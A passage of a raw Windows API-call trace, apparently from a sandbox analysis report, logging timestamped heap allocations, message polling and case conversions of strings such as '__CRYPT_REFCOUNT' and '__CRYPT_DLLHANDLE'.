Size=0x4) returned 0x2e54d58 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0194.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0194.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0194.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0194.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0194.939] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0194.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0194.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0194.939] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0194.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0194.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0194.940] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0194.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0194.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0194.940] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0194.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0194.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0194.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0194.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0194.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0194.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0194.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0194.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0194.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0194.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0194.940] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0194.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0194.940] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0194.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0194.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0194.940] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0194.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0194.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0194.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0194.941] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0194.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0194.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0194.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0194.941] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0194.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0194.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0194.941] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0194.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0194.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0194.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0194.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0194.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0194.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0194.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0194.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0194.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0194.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0194.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0194.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0194.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0194.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0194.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0194.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0194.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0194.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0194.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0194.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0194.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0194.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0194.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0194.942] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0194.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0194.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0194.942] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0194.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0194.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0194.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0194.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0194.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0194.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0194.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0194.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0194.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0194.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0194.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0194.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0194.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0194.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0194.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0194.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0194.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0194.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0194.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0194.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0194.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0194.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0194.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0194.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0194.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0194.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0194.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0194.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0194.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0194.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1196020 [0194.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1196020 | out: hHeap=0x970000) returned 1 [0195.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0195.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0195.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0195.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0195.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0195.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0195.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0195.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0195.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0195.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0195.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0195.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0195.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0195.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0195.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0195.019] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0195.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0195.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0195.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0195.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0195.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0195.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0195.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0195.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0195.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0195.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0195.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0195.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0195.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0195.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0195.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0195.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0195.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0195.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0195.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0195.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0195.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0195.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0195.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0195.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0195.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0195.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0195.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0195.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0195.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0195.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0195.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0195.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0195.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0195.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0195.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0195.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0195.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0195.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0195.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0195.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0195.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0195.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0195.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0195.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0195.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0195.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0195.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0195.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0195.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0195.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0195.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0195.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0195.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0195.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0195.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0195.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0195.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0195.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0195.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0195.023] 